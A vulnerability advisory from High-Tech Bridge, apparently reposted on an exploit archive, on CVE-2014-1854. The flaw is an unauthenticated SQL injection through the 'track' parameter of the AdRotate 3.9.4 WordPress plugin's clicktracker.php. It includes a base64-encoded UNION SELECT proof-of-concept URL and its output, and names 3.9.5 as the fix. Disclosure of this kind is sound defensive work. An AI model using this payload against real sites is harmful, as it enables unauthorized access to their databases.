AdRotate 3.9.4 SQL Injection Vulnerability

Vendor: AJdG Solutions
Vulnerable Version(s): 3.9.4 and probably prior
Tested Version: 3.9.4
Advisory Publication:  January 30, 2014  [without technical details]
Vendor Notification: January 30, 2014 
Vendor Patch: January 31, 2014 
Public Disclosure: February 20, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-1854
Risk Level: High 
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.


1) SQL Injection in AdRotate: CVE-2014-1854

The vulnerability exists due to insufficient validation of "track" HTTP GET parameter passed to
 "/wp-content/plugins/adrotate/library/clicktracker.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The following PoC code contains a base64-encoded string "-1 UNION SELECT version(),1,1,1", which will be injected into SQL query and will output MySQL server version:

http://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==

Successful exploitation will result in redirection to local URI that contains version of the MySQL server:
http://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log


-----------------------------------------------------------------------------------------------

Solution:

Update to AdRotate 3.9.5

More Information:
http://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/
http://wordpress.org/plugins/adrotate/changelog/
http://www.adrotateplugin.com/development/

#  0day.today [2018-04-09]  #